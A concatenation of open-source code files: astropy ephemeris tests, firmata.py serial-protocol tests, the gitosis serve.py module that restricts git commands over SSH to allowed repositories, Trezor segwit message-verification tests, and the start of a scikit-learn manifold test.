url = 'http://naif.jpl.nasa.gov/pub/naif/generic_kernels/spk/planets/de432s.bsp'
# Pass the ephemeris directly as a URL.
coord_by_url = get_body('earth', time, ephemeris=url)
# Translate the URL to the cached location on the filesystem.
# Since we just used the url above, it should already have been downloaded.
filepath = download_file(url, cache=True)
# Get the coordinates using the file path directly:
coord_by_filepath = get_body('earth', time, ephemeris=filepath)
# Using the URL or filepath should give exactly the same results:
assert_quantity_allclose(coord_by_url.ra, coord_by_filepath.ra)
assert_quantity_allclose(coord_by_url.dec, coord_by_filepath.dec)
assert_quantity_allclose(coord_by_url.distance, coord_by_filepath.distance)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
def test_url_ephemeris_wrong_input():
# Try loading a non-existing URL:
time = Time('1960-01-12 00:00')
with pytest.raises(HTTPError):
get_body('earth', time, ephemeris='http://data.astropy.org/path/to/nonexisting/file.bsp')
@pytest.mark.skipif('not HAS_JPLEPHEM')
def test_file_ephemeris_wrong_input():
time = Time('1960-01-12 00:00')
# Try loading a non-existing file:
with pytest.raises(ValueError):
get_body('earth', time, ephemeris='/path/to/nonexisting/file.bsp')
# Try loading a file that does exist, but is not an ephemeris file:
with pytest.raises(ValueError):
get_body('earth', time, ephemeris=__file__)
def test_regression_10271():
t = Time(58973.534052125986, format='mjd')
# GCRS position of ALMA at this time
obs_p = CartesianRepresentation(5724535.74068625, -1311071.58985697, -2492738.93017009, u.m)
geocentre = CartesianRepresentation(0, 0, 0, u.m)
icrs_sun_from_alma = _get_apparent_body_position('sun', t, 'builtin', obs_p)
icrs_sun_from_geocentre = _get_apparent_body_position('sun', t, 'builtin', geocentre)
difference = (icrs_sun_from_alma - icrs_sun_from_geocentre).norm()
assert_quantity_allclose(difference, 0.13046941*u.m, atol=1*u.mm)
| bsd-3-clause |
google/firmata.py | tests/test_io.py | 1 | 14001 | # Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest2 as unittest
import serial
import firmata
from firmata import io
from firmata.constants import *
FIRMATA_INIT = [chr(i) for i in (
PROTOCOL_VERSION, 0x5, 0x2, # Version 5.2
SYSEX_START, SE_REPORT_FIRMWARE, 0x5, 0x2, 0x54, 0x0, 0x65, 0x0, 0x73, 0x0, 0x74, 0x0, SYSEX_END, # Firmware 'Test'
)]
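# Firmata sysex strings are 7-bit encoded: each character arrives as an
# (lsb, msb) byte pair. A minimal decoding sketch (this helper is illustrative
# and not used by the tests):
def _decode_two_byte_string(data):
    return ''.join(chr(ord(data[i]) | (ord(data[i + 1]) << 7)) for i in range(0, len(data), 2))
# Applied to the firmware-name bytes above (0x54 0x00 0x65 0x00 0x73 0x00
# 0x74 0x00) it yields 'Test'.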
ARDUINO_CAPABILITY = [chr(i) for i in (
SYSEX_START, SE_CAPABILITY_RESPONSE,
0x7f,
0x7f,
0x0, 0x1, 0x1, 0x1, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x3, 0x8, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x3, 0x8, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x3, 0x8, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x3, 0x8, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x3, 0x8, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x3, 0x8, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x2, 0xa, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x2, 0xa, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x2, 0xa, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x2, 0xa, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x2, 0xa, 0x6, 0x1, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x2, 0xa, 0x6, 0x1, 0x7f, SYSEX_END,
)]
ARDUINO_ANALOG_MAPPING = [chr(i) for i in (
SYSEX_START, SE_ANALOG_MAPPING_RESPONSE,
0x7f, 0x7f, 0x7f, 0x7f, 0x7f, 0x7f, 0x7f, 0x7f, 0x7f, 0x7f, 0x7f, 0x7f, 0x7f,
0x0, 0x01, 0x02, 0x03, 0x04, 0x05, SYSEX_END,
)]
ARDUINO_BOARD_STATE = [chr(i) for i in (
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x00, 0x01, 0x00, SYSEX_END, # pin 1, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x02, 0x01, 0x00, SYSEX_END, # pin 2, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x03, 0x01, 0x00, SYSEX_END, # pin 3, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x04, 0x01, 0x00, SYSEX_END, # pin 4, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x05, 0x01, 0x00, SYSEX_END, # pin 5, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x06, 0x01, 0x00, SYSEX_END, # pin 6, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x07, 0x01, 0x00, SYSEX_END, # pin 7, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x08, 0x01, 0x00, SYSEX_END, # pin 8, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x09, 0x01, 0x00, SYSEX_END, # pin 9, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x0a, 0x01, 0x00, SYSEX_END, # pin 10, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x0b, 0x01, 0x00, SYSEX_END, # pin 11, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x0c, 0x01, 0x00, SYSEX_END, # pin 12, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x0d, 0x01, 0x00, SYSEX_END, # pin 13, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x0e, 0x02, 0x00, SYSEX_END, # pin 14 (A0), analog input, 0
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x0f, 0x02, 0x00, SYSEX_END, # pin 15 (A1), analog input, 0
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x10, 0x02, 0x00, SYSEX_END, # pin 16 (A2), analog input, 0
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x11, 0x02, 0x00, SYSEX_END, # pin 17 (A3), analog input, 0
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x12, 0x02, 0x00, SYSEX_END, # pin 18 (A4), analog input, 0
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x13, 0x02, 0x00, SYSEX_END, # pin 19 (A5), analog input, 0
)]
MONDO_DATA = [chr(i) for i in (
ANALOG_MESSAGE_0, 0x23, 0x00, # Pin A0 set to 0x23
DIGITAL_MESSAGE_0, 0b00000100, 0b00000000, # Pin 2 set.
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x04, 0x01, 0x00, SYSEX_END, # Report pin 4 mode and state
SYSEX_START, SE_RESERVED_COMMAND, 0x20, SYSEX_END # Hypothetical reserved command
)]
FIRMATA_UNKNOWN = [chr(i) for i in (
SYSEX_START, SE_RESERVED_COMMAND, 0x20, SYSEX_END # Hypothetical reserved command
)]
FIRMATA_STRING_DATA = [chr(i) for i in (
SYSEX_START, SE_STRING_DATA, 0x48, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x6C, 0x00, 0x6F, 0x00, SYSEX_END,
)]
I2C_REPLY_MESSAGE = [chr(i) for i in (
# | addr | reg | byte0 | byte1 |
SYSEX_START, SE_I2C_REPLY, 0x4f, 0x00, 0x00, 0x00, 0x7f, 0x01, 0x00, 0x00, SYSEX_END,
)]
I2C_REPLY_DICT = dict(token='I2C_REPLY', addr=0x4f, reg=0x00, data=[0xff, 0x00])
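# The I2C data bytes are likewise sent as 7-bit (lsb, msb) pairs, so the reply
# above reassembles as 0x7f | (0x01 << 7) == 0xff and 0x00 | (0x00 << 7) == 0x00,
# matching I2C_REPLY_DICT['data'] == [0xff, 0x00].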
class MockSerial(object):
def __init__(self, *args, **kargs):
self.data = []
self.output = []
def inWaiting(self):
return len(self.data)
def read(self, num=1, *args, **kargs):
if num > len(self.data):
raise Exception('Tried to read more bytes than available.')
ret = self.data[:num]
del self.data[:num]
return ret
def write(self, bytes):
self.output.append(bytes)
def flushInput(self):
pass
def flushOutput(self):
pass
def close(self):
pass
class LexerTest(unittest.TestCase):
def setUp(self):
super(LexerTest, self).setUp()
self._real_serial = serial.Serial
self._port = MockSerial()
serial.Serial = lambda *args,**kargs: self._port
def tearDown(self):
super(LexerTest, self).tearDown()
serial.Serial = self._real_serial
def test_Basic(self):
port = MockSerial()
port.data = [chr(i) for i in (PROTOCOL_VERSION, 0x5, 0x2, SYSEX_START, SE_REPORT_FIRMWARE, 0x5, 0x2, 0x54, 0x0, 0x65, 0x0, 0x73, 0x0, 0x74, 0x0, SYSEX_END)]
reader = io.SerialReader(port, None)
state = reader.lexInitial()
while state != reader.lexInitial:
state = state()
self.assertEqual(dict(token='PROTOCOL_VERSION', major=5, minor=2), reader.q.get())
state = reader.lexInitial()
while state != reader.lexInitial:
state = state()
self.assertEqual(dict(token='REPORT_FIRMWARE', major=5, minor=2, name='Test'), reader.q.get())
def test_Mondo(self):
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:] + MONDO_DATA[:]
board = firmata.Board('', 10, log_to_file=None, start_serial=True)
board.join(timeout=1)
board.StopCommunications()
self.assertEqual(len(board.errors), 1)
self.assertIn('RESERVED_COMMAND', board.errors[0])
self.assertIn({0: 1, 1: 1, 4: 14}, board.pin_config)
self.assertEqual(20, len(board.pin_config))
self.assertEqual('5.2', board.firmware_version)
self.assertEqual('Test', board.firmware_name)
self.assertEqual(board.pin_state[13], 35)
self.assertEqual(board.pin_state[2], True)
class FirmataTest(unittest.TestCase):
def setUp(self):
super(FirmataTest, self).setUp()
self._real_serial = serial.Serial
self._port = MockSerial()
serial.Serial = lambda *args,**kargs: self._port
def tearDown(self):
super(FirmataTest, self).tearDown()
serial.Serial = self._real_serial
def test_QueryBoardState(self):
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:]
self.board = firmata.Board('', 10, log_to_file=None, start_serial=True)
for i in xrange(20):
self.board.QueryPinState(i)
self.board.join(timeout=1)
self.board.StopCommunications()
self.assertEqual(self._port.output, [
# 0xF0 (START_SYSEX), 0X6D (PIN_STATE_QUERY), pin, 0XF7 (END_SYSEX)
'\xf0\x6d\x00\xf7', '\xf0\x6d\x01\xf7', '\xf0\x6d\x02\xf7', '\xf0\x6d\x03\xf7',
'\xf0\x6d\x04\xf7', '\xf0\x6d\x05\xf7', '\xf0\x6d\x06\xf7', '\xf0\x6d\x07\xf7',
'\xf0\x6d\x08\xf7', '\xf0\x6d\x09\xf7', '\xf0\x6d\x0a\xf7', '\xf0\x6d\x0b\xf7',
'\xf0\x6d\x0c\xf7', '\xf0\x6d\x0d\xf7', '\xf0\x6d\x0e\xf7', '\xf0\x6d\x0f\xf7',
'\xf0\x6d\x10\xf7', '\xf0\x6d\x11\xf7', '\xf0\x6d\x12\xf7', '\xf0\x6d\x13\xf7',])
def test_FirmataInit(self):
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:] + ARDUINO_BOARD_STATE[:]
board = firmata.Board('', 10, log_to_file='/tmp/testlog', start_serial=True)
board.join(timeout=2)
board.StopCommunications()
self.assertEqual(board.pin_mode[2], 1)
self.assertEqual(board.pin_mode[3], 1)
self.assertEqual(board.pin_mode[4], 1)
self.assertEqual(board.pin_mode[5], 1)
self.assertEqual(board.pin_mode[6], 1)
self.assertEqual(board.pin_mode[7], 1)
self.assertEqual(board.pin_mode[8], 1)
self.assertEqual(board.pin_mode[9], 1)
self.assertEqual(board.pin_mode[10], 1)
self.assertEqual(board.pin_mode[11], 1)
self.assertEqual(board.pin_mode[12], 1)
self.assertEqual(board.pin_mode[13], 1)
self.assertEqual(board.pin_mode[14], 2)
self.assertEqual(board.pin_mode[15], 2)
self.assertEqual(board.pin_mode[16], 2)
self.assertEqual(board.pin_mode[17], 2)
self.assertEqual(board.pin_mode[18], 2)
self.assertEqual(board.pin_mode[19], 2)
for i in xrange(2,19):
self.assertEqual(board.pin_state[i], 0)
def test_basicDigitalWrite(self):
"""Test basic functionality of digitalWrite()."""
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:]
board = firmata.Board('', 10, log_to_file=None, start_serial=True)
board.digitalWrite(8, 0)
board.join(timeout=1)
board.StopCommunications()
self.assertEqual(self._port.output, ['\x91\x00\x00'])
def test_digitalWriteDoesntLeakBits(self):
"""Test that digitalWrite() doesn't let one pin's value affect another's"""
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:]
board = firmata.Board('', 10, log_to_file=None, start_serial=True)
board.pin_mode[14] = MODE_OUTPUT # Lie
board.pin_state[14] = 0xff # Same pseudo-port as pin 8
board.digitalWrite(8, 0)
board.join(timeout=1)
board.StopCommunications()
self.assertEqual(self._port.output, ['\x91\x40\x00'])
# NOTE: the following test is flaky, not sure why. Output seen on failure:
# ['\x91@\x00']  (i.e. '\x91\x40\x00', as if the analog value leaked into the port byte)
def test_digitalWriteHasNoAnalogLeaks(self):
"""Test that analog values don't leak into digitalWrite()."""
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:] + ARDUINO_BOARD_STATE[:]
board = firmata.Board('', 10, log_to_file=None, start_serial=True)
board.pin_state[14] = 255 # Same pseudo-port as pin 8
board.digitalWrite(8, 0)
board.join(timeout=1)
board.StopCommunications()
print self._port.output
self.assertEqual(self._port.output, ['\x91\x00\x00'])
def test_I2CRead(self):
"""Test simple I2C read query is properly sent and reply lexxed"""
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:] + ARDUINO_BOARD_STATE[:]
board = firmata.Board('', 10, log_to_file=None, start_serial=True)
board.I2CConfig(0)
old_sysex = board.SendSysex
def FakeSysex(*args, **kargs):
self._port.data.extend(I2C_REPLY_MESSAGE[:])
old_sysex(*args, **kargs)
board.SendSysex = FakeSysex
reply = board._i2c_device.I2CRead(0x4f, 0x00, 2) # read 2 bytes from register 0
board.join(timeout=1)
board.StopCommunications()
# | i2c config | | start | addr | reg | 2 | end
self.assertEqual(self._port.output, ['\xf0\x78\x00\x00\xf7', '\xf0\x76\x4f\x08\x00\x00\x02\x00\xf7'])
self.assertEqual(reply, I2C_REPLY_DICT['data'])
def test_I2CWriteSend(self):
"""Test simple I2C write query is properly sent"""
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:] + ARDUINO_BOARD_STATE[:]
board = firmata.Board('', 10, log_to_file=None, start_serial=True)
board.I2CConfig(0)
board._i2c_device.I2CWrite(0x4f, 0x00, [0x7f, 0xff]) # write 2 bytes to register 0
board.join(timeout=1)
board.StopCommunications()
# | i2c config | | start | addr | reg | 2 bytes | end
self.assertEqual(self._port.output, ['\xf0\x78\x00\x00\xf7', '\xf0\x76\x4f\x00\x00\x00\x7f\x00\x7f\x01\xf7'])
def test_ListenerReuse(self):
"""Test that DispatchToken() will properly recycle listeners that request it"""
board = firmata.Board('', 10, log_to_file=None, start_serial=False)
def FakeListener(token):
return (False, True) # don't delete, do abort processing
FAKE_TOKEN = 'RESPONSE'
board.AddListener(FAKE_TOKEN, FakeListener)
token = {'token': FAKE_TOKEN}
board.DispatchToken(token)
self.assertEqual(board._listeners[FAKE_TOKEN], [FakeListener])
def test_OneTimeListener(self):
"""Test that DispatchToken() will properly delete listeners that request it"""
board = firmata.Board('', 10, log_to_file=None, start_serial=False)
def FakeListener(token):
return (True, True) # do delete, do abort processing
FAKE_TOKEN = 'RESPONSE'
board.AddListener(FAKE_TOKEN, FakeListener)
token = {'token': FAKE_TOKEN}
board.DispatchToken(token)
self.assertEqual(board._listeners[FAKE_TOKEN], [])
def test_SetSamplingInterval(self):
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:]
board = firmata.Board('', 10, log_to_file=None, start_serial=True)
board.SetSamplingInterval(1000)
board.SetSamplingInterval()
board.join(timeout=1)
board.StopCommunications()
self.assertEqual(self._port.output, ['\xf0\x7a\x68\x07\xf7', '\xf0\x7a\x13\x00\xf7'])
def test_StringData(self):
self._port.data = FIRMATA_INIT[:] + ARDUINO_CAPABILITY[:] + ARDUINO_ANALOG_MAPPING[:] + FIRMATA_STRING_DATA[:]
board = firmata.Board('', 10, log_to_file=None, start_serial=True)
board.join(timeout=1)
board.StopCommunications()
self.assertEqual(board.errors, ['Hello'])
| apache-2.0 |
elmer/smart-gitosis | gitosis/serve.py | 2 | 8691 | """
Enforce git-shell to only serve repositories allowed by the access control
policy. Repositories live under a single base directory; the client should
refer to them without any extra directory prefix. Repository names are
forced to match ALLOW_RE.
"""
import logging
import sys, os, re
from gitosis import access
from gitosis import repository
from gitosis import gitweb
from gitosis import gitdaemon
from gitosis import app
from gitosis import util
import amqplib.client_0_8 as amqp
import simplejson as json
log = logging.getLogger('gitosis.serve')
ALLOW_RE = re.compile("^'/*(?P<path>[a-zA-Z0-9][a-zA-Z0-9@._-]*(/[a-zA-Z0-9][a-zA-Z0-9@._-]*)*)'$")
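# Illustrative ALLOW_RE behaviour (the argument arrives shell-quoted):
#   "'foo/bar'"  -> path == 'foo/bar'
#   "'/foo.git'" -> leading slashes are stripped, path == 'foo.git'
#   "'../evil'"  -> no match; each path segment must start with an alphanumeric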
COMMANDS_READONLY = [
'git-upload-pack',
'git upload-pack',
]
COMMANDS_WRITE = [
'git-receive-pack',
'git receive-pack',
]
class ServingError(Exception):
"""Serving error"""
def __str__(self):
return '%s' % self.__doc__
class CommandMayNotContainNewlineError(ServingError):
"""Command may not contain newline"""
class UnknownCommandError(ServingError):
"""Unknown command denied"""
class UnsafeArgumentsError(ServingError):
"""Arguments to command look dangerous"""
class AccessDenied(ServingError):
"""Access denied to repository"""
class WriteAccessDenied(AccessDenied):
"""Repository write access denied"""
class ReadAccessDenied(AccessDenied):
"""Repository read access denied"""
def amqp_config(config):
return {
'host': config.get("amqp", "host"),
'user_id': config.get("amqp", "user_id"),
'password': config.get("amqp", "password"),
'ssl': config.getboolean("amqp", "ssl"),
'exchange': config.get("amqp", "exchange"),
}
def send_amqp_message(host="localhost", user_id="guest", password="guest", ssl=True,
exchange="gitosis.post_update", data={}):
m = json.dumps(data)
log.info('Sending "%s" to: %s' % (m, exchange))
msg = amqp.Message(m, content_type='text/plain')
conn = amqp.Connection(host, userid=user_id, password=password, ssl=ssl)
ch = conn.channel()
ch.access_request('/data', active=True, write=True)
ch.exchange_declare(exchange, 'fanout', auto_delete=False)
ch.basic_publish(msg, exchange)
ch.close()
conn.close()
return True
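# A minimal usage sketch (host and credentials are placeholders):
#   send_amqp_message(host='amqp.example.com', user_id='git', password='secret',
#                     ssl=True, exchange='gitosis.post_update',
#                     data={'repository': 'myrepo'})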
def repository_path(cfg, user, command):
try:
verb, args = command.split(None, 1)
except ValueError:
# all known "git-foo" commands take one argument; improve
# if/when needed
raise UnknownCommandError()
if verb == 'git':
try:
subverb, args = args.split(None, 1)
except ValueError:
# all known "git foo" commands take one argument; improve
# if/when needed
raise UnknownCommandError()
verb = '%s %s' % (verb, subverb)
match = ALLOW_RE.match(args)
if match is None:
raise UnsafeArgumentsError()
path = match.group('path')
return path
## Determine whether this command is a write that should trigger an AMQP message.
def should_send_message(cfg, user, command):
if not cfg.has_section('amqp'):
return False
if '\n' in command:
raise CommandMayNotContainNewlineError()
try:
verb, args = command.split(None, 1)
except ValueError:
# all known "git-foo" commands take one argument; improve
# if/when needed
raise UnknownCommandError()
## only send the message if we have use_amqp set in the config file...
if not cfg.getboolean("amqp", "use_amqp"):
return False
if verb == 'git':
try:
subverb, args = args.split(None, 1)
except ValueError:
# all known "git foo" commands take one argument; improve
# if/when needed
raise UnknownCommandError()
verb = '%s %s' % (verb, subverb)
match = ALLOW_RE.match(args)
if match is None:
raise UnsafeArgumentsError()
path = match.group('path')
return verb in COMMANDS_WRITE
def serve(cfg, user, command):
if '\n' in command:
raise CommandMayNotContainNewlineError()
try:
verb, args = command.split(None, 1)
except ValueError:
# all known "git-foo" commands take one argument; improve
# if/when needed
raise UnknownCommandError()
if verb == 'git':
try:
subverb, args = args.split(None, 1)
except ValueError:
# all known "git foo" commands take one argument; improve
# if/when needed
raise UnknownCommandError()
verb = '%s %s' % (verb, subverb)
if (verb not in COMMANDS_WRITE
and verb not in COMMANDS_READONLY):
raise UnknownCommandError()
match = ALLOW_RE.match(args)
if match is None:
raise UnsafeArgumentsError()
path = match.group('path')
# write access is always sufficient
newpath = access.haveAccess(
config=cfg,
user=user,
mode='writable',
path=path)
if newpath is None:
# didn't have write access; try once more with the popular
# misspelling
newpath = access.haveAccess(
config=cfg,
user=user,
mode='writeable',
path=path)
if newpath is not None:
log.warning(
                'Repository %r config has typo "writeable", '
                'should be "writable"',
path,
)
if newpath is None:
# didn't have write access
newpath = access.haveAccess(
config=cfg,
user=user,
mode='readonly',
path=path)
if newpath is None:
raise ReadAccessDenied()
if verb in COMMANDS_WRITE:
# didn't have write access and tried to write
raise WriteAccessDenied()
(topdir, relpath) = newpath
assert not relpath.endswith('.git'), \
'git extension should have been stripped: %r' % relpath
repopath = '%s.git' % relpath
fullpath = os.path.join(topdir, repopath)
if (not os.path.exists(fullpath)
and verb in COMMANDS_WRITE):
# it doesn't exist on the filesystem, but the configuration
# refers to it, we're serving a write request, and the user is
# authorized to do that: create the repository on the fly
# create leading directories
p = topdir
for segment in repopath.split(os.sep)[:-1]:
p = os.path.join(p, segment)
util.mkdir(p, 0750)
repository.init(path=fullpath)
gitweb.set_descriptions(config=cfg)
generated = util.getGeneratedFilesDir(config=cfg)
gitweb.write_project_list(cfg,
os.path.join(generated, 'projects.list')
)
gitdaemon.set_export_ok(cfg)
# put the verb back together with the new path
newcmd = "%(verb)s '%(path)s'" % dict(
verb=verb,
path=fullpath,
)
return newcmd
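# For example, an incoming "git-upload-pack '/myrepo'" is rewritten, given
# read access, into something like
# "git-upload-pack '/srv/gitosis/repositories/myrepo.git'" (paths here are
# illustrative).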
class Main(app.App):
def create_parser(self):
parser = super(Main, self).create_parser()
parser.set_usage('%prog [OPTS] USER')
parser.set_description(
'Allow restricted git operations under DIR')
return parser
def handle_args(self, parser, cfg, options, args):
try:
(user,) = args
except ValueError:
parser.error('Missing argument USER.')
main_log = logging.getLogger('gitosis.serve.main')
os.umask(0022)
cmd = os.environ.get('SSH_ORIGINAL_COMMAND', None)
if cmd is None:
main_log.error('Need SSH_ORIGINAL_COMMAND in environment.')
sys.exit(1)
main_log.debug('Got command %(cmd)r' % dict(
cmd=cmd,
))
os.chdir(os.path.expanduser('~'))
try:
newcmd = serve(
cfg=cfg,
user=user,
command=cmd,
)
except ServingError, e:
main_log.error('%s', e)
sys.exit(1)
        ## if we are writing then we need to notify the AMQP exchange once the child process exits
main_log.debug('Serving %s', newcmd)
pid = os.fork()
if not pid:
os.execvp('git', ['git', 'shell', '-c', newcmd])
main_log.error('Cannot execute git-shell.')
sys.exit(1)
else:
os.wait()
try:
                if should_send_message(cfg=cfg, user=user, command=cmd):
send_amqp_message(data={'repository': repository_path(cfg=cfg, user=user, command=cmd)}, **amqp_config(cfg))
except ServingError, e:
main_log.error('%s', e)
sys.exit(1)
| gpl-2.0 |
jhoenicke/python-trezor | trezorlib/tests/device_tests/test_msg_verifymessage_segwit.py | 3 | 4567 | # This file is part of the Trezor project.
#
# Copyright (C) 2012-2018 SatoshiLabs and contributors
#
# This library is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License version 3
# as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the License along with this library.
# If not, see <https://www.gnu.org/licenses/lgpl-3.0.html>.
from trezorlib import btc
from .common import TrezorTest
class TestMsgVerifymessageSegwit(TrezorTest):
def test_message_long(self):
self.setup_mnemonic_nopin_nopassphrase()
ret = btc.verify_message(
self.client,
"Bitcoin",
"3CwYaeWxhpXXiHue3ciQez1DLaTEAXcKa1",
bytes.fromhex(
"245ff795c29aef7538f8b3bdb2e8add0d0722ad630a140b6aefd504a5a895cbd867cbb00981afc50edd0398211e8d7c304bb8efa461181bc0afa67ea4a720a89ed"
),
"VeryLongMessage!" * 64,
)
assert ret is True
def test_message_testnet(self):
self.setup_mnemonic_nopin_nopassphrase()
ret = btc.verify_message(
self.client,
"Testnet",
"2N4VkePSzKH2sv5YBikLHGvzUYvfPxV6zS9",
bytes.fromhex(
"249e23edf0e4e47ff1dec27f32cd78c50e74ef018ee8a6adf35ae17c7a9b0dd96f48b493fd7dbab03efb6f439c6383c9523b3bbc5f1a7d158a6af90ab154e9be80"
),
"This is an example of a signed message.",
)
assert ret is True
def test_message_verify(self):
self.setup_mnemonic_nopin_nopassphrase()
# trezor pubkey - OK
res = btc.verify_message(
self.client,
"Bitcoin",
"3CwYaeWxhpXXiHue3ciQez1DLaTEAXcKa1",
bytes.fromhex(
"249e23edf0e4e47ff1dec27f32cd78c50e74ef018ee8a6adf35ae17c7a9b0dd96f48b493fd7dbab03efb6f439c6383c9523b3bbc5f1a7d158a6af90ab154e9be80"
),
"This is an example of a signed message.",
)
assert res is True
# trezor pubkey - FAIL - wrong sig
res = btc.verify_message(
self.client,
"Bitcoin",
"3CwYaeWxhpXXiHue3ciQez1DLaTEAXcKa1",
bytes.fromhex(
"249e23edf0e4e47ff1dec27f32cd78c50e74ef018ee8a6adf35ae17c7a9b0dd96f48b493fd7dbab03efb6f439c6383c9523b3bbc5f1a7d158a6af90ab154e9be00"
),
"This is an example of a signed message.",
)
assert res is False
# trezor pubkey - FAIL - wrong msg
res = btc.verify_message(
self.client,
"Bitcoin",
"3CwYaeWxhpXXiHue3ciQez1DLaTEAXcKa1",
bytes.fromhex(
"249e23edf0e4e47ff1dec27f32cd78c50e74ef018ee8a6adf35ae17c7a9b0dd96f48b493fd7dbab03efb6f439c6383c9523b3bbc5f1a7d158a6af90ab154e9be80"
),
"This is an example of a signed message!",
)
assert res is False
def test_verify_utf(self):
self.setup_mnemonic_nopin_nopassphrase()
words_nfkd = u"Pr\u030ci\u0301s\u030cerne\u030c z\u030clut\u030couc\u030cky\u0301 ku\u030an\u030c u\u0301pe\u030cl d\u030ca\u0301belske\u0301 o\u0301dy za\u0301ker\u030cny\u0301 uc\u030cen\u030c be\u030cz\u030ci\u0301 pode\u0301l zo\u0301ny u\u0301lu\u030a"
words_nfc = u"P\u0159\xed\u0161ern\u011b \u017elu\u0165ou\u010dk\xfd k\u016f\u0148 \xfap\u011bl \u010f\xe1belsk\xe9 \xf3dy z\xe1ke\u0159n\xfd u\u010de\u0148 b\u011b\u017e\xed pod\xe9l z\xf3ny \xfal\u016f"
res_nfkd = btc.verify_message(
self.client,
"Bitcoin",
"3CwYaeWxhpXXiHue3ciQez1DLaTEAXcKa1",
bytes.fromhex(
"24d0ec02ed8da8df23e7fe9e680e7867cc290312fe1c970749d8306ddad1a1eda41c6a771b13d495dd225b13b0a9d0f915a984ee3d0703f92287bf8009fbb9f7d6"
),
words_nfkd,
)
res_nfc = btc.verify_message(
self.client,
"Bitcoin",
"3CwYaeWxhpXXiHue3ciQez1DLaTEAXcKa1",
bytes.fromhex(
"24d0ec02ed8da8df23e7fe9e680e7867cc290312fe1c970749d8306ddad1a1eda41c6a771b13d495dd225b13b0a9d0f915a984ee3d0703f92287bf8009fbb9f7d6"
),
words_nfc,
)
assert res_nfkd is True
assert res_nfc is True
| lgpl-3.0 |
ankurankan/scikit-learn | sklearn/manifold/tests/test_locally_linear.py | 41 | 4827 | from itertools import product
from nose.tools import assert_true
import numpy as np
from numpy.testing import assert_almost_equal, assert_array_almost_equal
from scipy import linalg
from sklearn import neighbors, manifold
from sklearn.manifold.locally_linear import barycenter_kneighbors_graph
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import ignore_warnings
eigen_solvers = ['dense', 'arpack']
#----------------------------------------------------------------------
# Test utility routines
def test_barycenter_kneighbors_graph():
X = np.array([[0, 1], [1.01, 1.], [2, 0]])
A = barycenter_kneighbors_graph(X, 1)
assert_array_almost_equal(
A.toarray(),
[[0., 1., 0.],
[1., 0., 0.],
[0., 1., 0.]])
A = barycenter_kneighbors_graph(X, 2)
    # check that each row of weights sums to one
